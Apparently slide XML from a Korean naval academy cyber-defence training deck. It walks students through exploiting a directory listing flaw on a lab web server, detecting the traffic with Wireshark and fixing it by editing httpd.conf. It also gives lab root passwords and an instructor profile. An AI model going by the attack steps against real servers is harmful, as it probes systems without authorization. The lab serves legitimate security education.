              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>iceweasel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>프로그램 실행</a:t>
            </a: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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>인터넷 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>http://web.navy.mil.kr/webhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 입력하여 피해 서버에 접속</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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웹 페이지에 게시글 목록에 경로 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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>게시글 경로로 들어가 디렉토리 확인한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a: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5. keycode.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a: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a:t>터미널 실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>#acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>학생 화면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>  (id: root  PW: root123)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>학생들은 각자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 바탕화면에 터미널 실행 한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>setup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>확인</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marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>관리자 화면에서 왼쪽 ‘교관 공격‘ 탭 클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격하고자 하는 해당 문제번호와 할당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 확인 후 체크박스에 체크를 하고 공격실행 버튼 클릭</a:t>
            </a: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endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>‘공격 실행’ 버튼 클릭 시 아래와 같이 완료 화면이 나오고 공격상태가 ‘공격 중’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Web/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>취약점 직접 객체 참조 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>탐지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>웹 서버에서 아이콘 클릭</a:t>
            </a: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ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 이용하여 패킷을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속한 웹서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 들어오는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>webhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/board</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 접속하는 정보를 가지고 있는 패킷을 확인한다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷에 오른쪽 마우스 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Follow TCP Stream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>클릭 하여 패킷의 상세한 내용을 확인한다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 Follow TCP Stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>정보에 웹서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>board</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>의 목록이 전송되는 것을 확인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>할수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 있다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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>   1. Directory Listing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 대한 공격을 차단 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/httpd/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설정 파일에서 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>모든 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Options Indexes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>FollowSymLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -&gt; Options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>FollowSymLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/httpd/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>웹 서버 설정 파일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(Options Indexes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>FollowSymLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>디렉토리 지시자는 해당 디렉토리 이하의 모든 웹 문서를 웹 페이지에서 어떻게 제어 할 것인가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/httpd/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service httpd restart</a:t>
            </a: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a:t>터미널 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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/Intro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>교수소개</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a:t>2021</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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a:t>2020</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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a:t>2019</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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a:t>2018</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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a:t>고려대학교 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>사이버국방학과 졸업</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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a:t>전문사관 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>기 임관</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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a:t>국방과학연구소</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>본부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>부 파견</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>고려대학교 정보보호대학원</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>석사과정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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a:t>해군사관학교 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>교수사관 전임</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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a:t>IEEE AI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>학회</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>논문 등록</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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a:t>이름 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1"/>
              <a:t>백도우</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>계급 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>대위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>진</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>나이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>: 27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>병과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>정통</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>직책 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>: 1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1"/>
              <a:t>교수부</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1"/>
              <a:t>이학처</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t> 전산과학과</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>         2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>사이버전 연구센터 모의훈련</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="140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a:t>2016</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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a:t>Best Of Best 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>취약점트랙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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a:t>‘I Copied It’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>클릭 한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>분간 기다림</a:t>
            </a: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endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>부팅이 완료되어 다음과 같은 화면이 나오면 설치완료</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>된것</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>아이디 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패스워드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hackerschool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 로그인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>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ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 명령어를 입력하여 서버 아이피를 확인한다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7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Putty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>다운로드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>자신의 컴퓨터에 맞는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>putty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다운로드</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
